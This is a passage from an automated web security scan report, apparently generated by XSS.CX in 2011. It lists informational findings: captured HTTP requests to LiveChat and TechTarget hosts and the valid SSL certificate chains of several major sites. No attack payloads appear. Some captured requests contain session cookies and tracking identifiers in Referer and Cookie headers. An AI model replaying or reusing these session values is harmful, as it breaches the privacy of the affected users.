User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13224
Connection: Keep-Alive

.PNG
.
...IHDR...0...%......na.....iCCPICC Profile..x..T.k.P...e....:g. >h.ndStC..kW..Z.6.!H..m\..$.~....o:.w..>.....o{...a..."L."...4M'S.......9'..^..qZ../..USO.........^.C+.hM...J&G@...y......lt.
...[SNIP]...

27.5. https://chat.livechatinc.net/server/js/language-en.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/server/js/language-en.js

Request

GET /server/js/language-en.js HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9132
Connection: Keep-Alive

/* LiveChat english language file ** IMPORTANT ** remember to keep this file 1:1 with LCL.js*/var Language = [];// WelcomeLanguage['Welcome'] = "Welcome!";Language['Welcome_title'] = "We
...[SNIP]...

27.6. https://chat.livechatinc.net/server/js/livechat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/server/js/livechat.js

Request

Response

27.7. http://gis1.livechatinc.com/gis.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gis1.livechatinc.com
Path:	/gis.cgi

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load HTTP/1.1
Host: gis1.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 44

__lc_load({"server":"chat.livechatinc.net"})

27.8. http://gis2.livechatinc.com/gis.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gis2.livechatinc.com
Path:	/gis.cgi

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load HTTP/1.1
Host: gis2.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 44

__lc_load({"server":"chat.livechatinc.net"})

27.9. http://gis3.livechatinc.com/gis.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gis3.livechatinc.com
Path:	/gis.cgi

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load HTTP/1.1
Host: gis3.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/open-support-case
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 44

__lc_load({"server":"chat.livechatinc.net"})

27.10. http://gis4.livechatinc.com/gis.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gis4.livechatinc.com
Path:	/gis.cgi

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load HTTP/1.1
Host: gis4.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/open-support-case
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 44

__lc_load({"server":"chat.livechatinc.net"})

27.11. http://gis5.livechatinc.com/gis.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gis5.livechatinc.com
Path:	/gis.cgi

Request

GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load HTTP/1.1
Host: gis5.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/mobile-security-7-enterprise-edition
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 44

__lc_load({"server":"chat.livechatinc.net"})

27.12. http://users.techtarget.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: users.techtarget.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=cabRe8jN89eSe8cEny0it; __utma=91947166.1684316195.1315138803.1315138803.1315138803.1; __utmb=91947166.1.10.1315138803; __utmc=91947166; __utmz=91947166.1315138803.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "GMcwe7JOJnt"
Last-Modified: Wed, 22 Jun 2011 18:10:48 GMT
Content-Length: 894
Date: Sun, 04 Sep 2011 12:24:17 GMT

..............h.......(....... ................................................ .......... ..==...................((.......F..p..p..p..F.......................((....N..h..w...........w..h..N....
...[SNIP]...

28. SSL certificate previous
There are 8 instances of this issue:

https://adwords.google.com/
https://api.twitter.com/
https://chat.livechatinc.net/
https://docs.djangoproject.com/
https://docs.google.com/
https://drh.img.digitalriver.com/
https://github.com/
https://store.digitalriver.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

28.1. https://adwords.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	adwords.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:49 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:49 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

28.2. https://api.twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://api.twitter.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	api.twitter.com
Issued by:	VeriSign Class 3 Secure Server CA - G2
Valid from:	Mon May 17 18:00:00 GMT-06:00 2010
Valid to:	Thu May 17 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G2
Issued by:	VeriSign Trust Network
Valid from:	Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:	Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 18:00:00 GMT-06:00 1998
Valid to:	Tue Aug 01 17:59:59 GMT-06:00 2028

28.3. https://chat.livechatinc.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	chat.livechatinc.net
Issued by:	Thawte SSL CA
Valid from:	Thu Jul 14 18:00:00 GMT-06:00 2011
Valid to:	Mon Aug 13 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:	Wed Dec 30 17:59:59 GMT-06:00 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 18:00:00 GMT-06:00 1996
Valid to:	Fri Jan 01 17:59:59 GMT-06:00 2021

28.4. https://docs.djangoproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.djangoproject.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.djangoproject.com
Issued by:	Gandi Standard SSL CA
Valid from:	Tue May 03 18:00:00 GMT-06:00 2011
Valid to:	Thu May 03 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	Gandi Standard SSL CA
Issued by:	UTN-USERFirst-Hardware
Valid from:	Wed Oct 22 18:00:00 GMT-06:00 2008
Valid to:	Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:	Tue Jul 09 12:19:22 GMT-06:00 2019

28.5. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:	Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:	Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

28.6. https://drh.img.digitalriver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.img.digitalriver.com,ST=Minnesota
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Feb 03 08:22:35 GMT-06:00 2011
Valid to:	Fri Feb 03 08:22:35 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

28.7. https://github.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	github.com
Issued by:	DigiCert High Assurance EV CA-1
Valid from:	Thu May 26 18:00:00 GMT-06:00 2011
Valid to:	Mon Jul 29 06:00:00 GMT-06:00 2013

Certificate chain #1

Issued to:	DigiCert High Assurance EV CA-1
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Thu Nov 09 18:00:00 GMT-06:00 2006
Valid to:	Tue Nov 09 18:00:00 GMT-06:00 2021

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Thu Nov 09 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 09 18:00:00 GMT-06:00 2031

28.8. https://store.digitalriver.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.digitalriver.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon May 10 03:55:03 GMT-06:00 2010
Valid to:	Sat Jul 11 14:04:49 GMT-06:00 2015

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:	Wed Aug 22 10:41:51 GMT-06:00 2018

Report generated by XSS.CX at Sun Sep 04 09:53:34 GMT-06:00 2011.